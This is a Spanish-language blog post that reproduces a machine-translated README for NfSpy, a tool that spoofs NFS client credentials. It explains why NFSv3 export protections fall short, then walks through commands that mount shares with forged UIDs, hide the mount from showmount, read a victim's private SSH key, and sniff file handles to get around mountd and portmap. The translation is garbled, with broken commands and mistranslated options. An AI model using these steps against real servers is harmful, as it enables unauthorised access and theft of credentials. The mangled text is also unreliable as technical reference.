jueves, 19 de abril de 2012

NfSpy - un ID de cliente NFS-spoofing

Saludos Mundo Libre.

NfSpy - un ID de cliente NFS-spoofing.

NfSpy es un programa de biblioteca / que utiliza el sistema de archivos en espacio de usuario (FUSE) para automatizar la biblioteca de la falsificación de credenciales de montaje NFS cuando un recurso compartido NFS.La vulnerabilidad explotada
NFS antes de la versión 4 es dependiente en las relaciones de confianza de acogida para la autenticación. El servidor NFS confía en los equipos cliente para autenticar a los usuarios y asignar los identificadores de usuario (UID mismos) que el sistema de archivos compartidos que utiliza. Esto funciona en NIS, NIS +, LDAP y los dominios, por ejemplo, pero sólo si usted sabe que la máquina cliente no está en peligro, o fingiendo su identidad. Esto se debe a la autenticación sólo en el protocolo NFS es la aprobación de la UID y el GID (ID de grupo). Hay algunas cosas que se pueden hacer para mejorar la seguridad de NFS, pero muchas de ellas son soluciones incompletas, e incluso con las tres mencionadas anteriormente, aún podría ser posible para eludir las medidas de seguridad.Squash raíz
El servidor o la participación de la ("exportación" en la jerga de NFS) se puede configurar squash_root, lo que significa que todas las solicitudes que llegan al afirmar que el UID o GID 0 (root) será tratado como el usuario nobody, o su equivalente en el sistema. Esto no impide que un atacante la suplantación de cualquier otro UID / GID combinado, sino que protegen la información más sensible y configuraciones de la exportación.nfs_portmon
Otra opción que se puede activar es nfs_portmon, que rechaza las peticiones procedentes de los puertos de origen fuera del rango 513-1024. Dado que sólo root puede (por lo general) asignar estos puertos, esto impide que un usuario normal en un equipo de confianza de la escritura y el uso de su propio cliente de NFS que las falsificaciones UID / GID. No hace nada para detener una gran pícaro, un usuario con permisos de la UB, o una máquina de nivel raíz comprometida de hacer lo mismo.Restricciones a la exportación
Las acciones y las exportaciones puede ser controlado de modo que sólo determinadas máquinas puedan acceder a ellos. Estas listas de control de acceso pueden consistir en:

    
Las direcciones IP (por ejemplo, 192.168.1.34)
    
Prefijos IP (por ejemplo, @ 192.168.1)
    
nombres de host (por ejemplo, server1.mydom.nis)
    
las listas de acogida (por eje @ trusted_hosts)
    
"Todo el mundo"
La mejor configuración sería utilizar una lista de host, ya que la consulta el demonio nfs acaba de dar el nombre de la lista no, que direcciones o nombres que contiene. Siguiente en la línea sería direcciones IP o los nombres de host, ya que son más difíciles de falsificar. Prefijos IP y "todos" son indicadores de la inseguridad, ya que hay poca o ninguna restricción en lo que las direcciones se pueden conectar.Usando NfSpy
Una lista de opciones puede verse mediante la ejecución
nfspy - help
Ejemplo
No es un servidor NFS en 192.168.1.124.
$ Showmount-e 192.168.1.124Exportar lista de 192.168.1.124:/ Home (todos)
Montar el recurso compartido. Utilizar sudo le permite unirse a un puerto privilegiado, y la opción allow_other permite a cualquier usuario utilizar el sistema de archivos. La otra opción nueva aquí es "esconder", que de inmediato "desmonta" la participación en el servidor, pero mantiene el gestor de archivo que tiene. Esto oculta su presencia de cualquier persona que use showmount-a
$ Sudo nfspy-o servidor = 192.168.1.124 :/ home, cuero, allow_other, ro, intr / mnt
Disfrute de su nueva libertad!
$ Cd / mnt/ Mnt $ ls-ldrwx ------ 74 8888 200 4096 2011 -03-03 09:55 smithj/ Mnt $ cd smithj/ Mnt / smithj $ cat .ssh / id.rsa----- BEGIN RSA PRIVATE KEY -----Proc-Type: 4, CIFRADODEK-Info: DES-EDE3-CBC, 30AEB543E512CA19
Para desmontar, utilice fusermount:
$ Sudo-u fusermount / mnt
Ejemplo avanzado
No es un servidor NFS en 192.168.1.124. Portmap está bloqueado, por lo que no puede obtener una lista de acciones, pero se puede escuchar el tráfico de la red.
$ Sudo tshark-n-i eth0-T campos-e nfs.fhandleEjecutar como usuario "root" y grupo "root". Esto podría ser peligroso.La captura de eth001:00:04:00:01:00:22:00: E5: 03: d8: 9d: 00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:0001:00:04:01:01:00:22:00: E5: 03: d8: 9d: 07:00:22:00:15:83:74: d5: 00:00:00:00:00: 00:00:00:00:00:00:0001:00:04:01:01:00:22:00: E5: 03: d8: 9d: 07:00:22:00:15:83:74: d5: 00:00:00:00:00: 00:00:00:00:00:00:00
^ C3 paquetes capturados
Ahora usa el dirhandle y las opciones de montaje GetRoot evitar el uso de el demonio de montaje, y utilice la opción nfsport evitar el uso del mapeador de puertos, que atraviesa el árbol de directorios a la raíz de la exportación.
$ Sudo nfspy-o mnt
Tenga en cuenta que no nos proporcionan un camino para montar, ya que todos sabemos es el gestor de archivo NFS.FALLOS

    
El acceso de escritura es beta. Ha trabajado en mis pruebas en un puñado de sistemas, pero podría utilizar más pruebas. Debido a esto, los valores predeterminados NfSpy para montaje de transbordo. Especifique la opción rw mount para cambiar esta situación.

    
NfSpy no funciona con los servicios estándar lockd y statd, lo que podría causar problemas con la escritura a los archivos. Por sólo lectura, sin embargo, y la mayoría de los usos nefastos para que se pretendía, esto no debería ser un problema.

    
NfSpy sólo es compatible con NFSv3 en este momento. Las versiones futuras de forma inteligente puede elegir una versión de NFS.


Fuente:https://github.com/bonsaiviking/NfSpy

Descarga:https://github.com/bonsaiviking/NfSpy

Traduccion:Dellcom1@.

Saludos Mundo Libre. 

No hay comentarios:

Publicar un comentario